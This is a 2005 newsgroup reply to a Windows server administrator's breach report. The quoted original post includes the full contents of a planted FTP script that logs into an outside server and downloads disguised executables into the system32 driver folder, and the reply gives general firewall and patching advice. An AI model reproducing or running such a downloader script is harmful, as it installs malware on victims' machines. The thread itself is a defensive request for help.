Re: Security Breach

From: Mark (nothere_at_notthere.com)
Date: 06/30/05


Date: 29 Jun 2005 22:49:02 -0500


"quest" <tobiquest@hotmail.com> wrote in message
news:1120010819.796186.225260@z14g2000cwz.googlegroups.com...
> I am running windows 2k adv server, running iis , cold fusion, sql
> server 2k, zone alarm file, netopia cayman 5300 series router and
> remote admin. I just noticed a file C:\MSSQL_Script.txt which is
> requesting ftp access to download some malicious file.. My Questions
>
> I rebuilt my PC from a backup but the file just re-appeared again.
> 1) Does any know how they might have gotten in. i only have port
> 80,443,20,21 opened
> 2) how do hacker schedule jobs. Cos i didn notice a recp.exe program
> requesting access also.
> 3) Can some help with the next steps i need to take.
>
> Thanks
>
> content of file
>
> open ftp.cybton.com
> USER mkeoma uvrlSN
> USER mkeoma uvrlSN
> binary
> get /mowl/MSIntskmngr.exe C:\winnt\system32\driver\MSIntskmngr.exe
> get /mowl/mspaintfixd.tmp C:\winnt\system32\driver\mspaintfixd.tmp
> get /mowl/net.exe C:\winnt\system32\driver\net.exe
> get /mowl/notepadc.xcl C:\winnt\system32\driver\notepadc.xcl
> quit
> open ftp.cybton.com
> USER eazy VEDgFT
> binary
> get /mowl/MSIntskmngr.exe C:\winnt\system32\driver\MSIntskmngr.exe
> get /mowl/mspaintfixd.tmp C:\winnt\system32\driver\mspaintfixd.tmp
> get /mowl/net.exe C:\winnt\system32\driver\net.exe
> get /mowl/notepadc.xcl C:\winnt\system32\driver\notepadc.xcl
> quit
>

I couldn't see exact specifications, but that router doesn't look to be much
of a firewall, probably only SPI, and Zone Alarm is a software based SPI
firewall with its own limitations. So you need to make sure either all
applications facing the internet (ie those on ports 80, 443, 20, and 21) are
fully patched, or need to look at a firewall with Intrusion Detection
capabilities (ie Netscreen/Sonicwall/Fortinet).